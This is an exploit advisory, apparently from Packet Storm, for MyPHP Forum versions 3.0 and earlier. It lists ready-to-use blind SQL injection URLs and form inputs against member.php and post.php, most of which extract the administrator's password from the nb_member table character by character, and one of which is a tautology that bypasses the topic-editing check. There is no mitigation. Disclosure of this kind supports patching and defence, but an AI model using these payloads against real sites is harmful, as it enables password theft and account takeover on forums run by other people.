MyPHP Forum (Final) versions 3.0 and below suffer from multiple remote blind SQL injection vulnerabilities. One of these is an known issue from December of 2007.
03c5b48174bab46ef5522444104b749c2e5237a9bcb3e89b75f4c8a8b0b9be2a/*
-----------------------------------------------------------------------------------
MyPHP Forum (Final) <= 3.0 (Edit Topics/Blind SQL Injection) Remote Vulnerabilities
-----------------------------------------------------------------------------------
Discovered By StAkeR[at]hotmail[dot]it
Download On http://www.myphp.ws/
- member.php (confirm - Blind SQL Injection)
- member.php?action=confirm&id=' or ascii(substring((select password from nb_member where uid=1),1,1))=98/*
- member.php (newconfirm - Blind SQL Injection)
- member.php?action=newconfirm&user=' or ascii(substring((select password from nb_member where uid=1),1,1))=98--
- member.php?action=reqpwd (reqpwd - Blind SQL Injection)
- insert ' or ascii(substring((select password from nb_member where uid=1),1,1))=98#
- post.php (post Blind SQL Injection)
- post.php?action=post&fid=1&tid=1"e=' or ascii(substring((select password from nb_member where uid=1),1,1))=9%23
- post.php (edit - Edit Topics)
- post.php?action=edit&fid=1&tid=1&pid=[id topic] ' or '1=1
/*
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed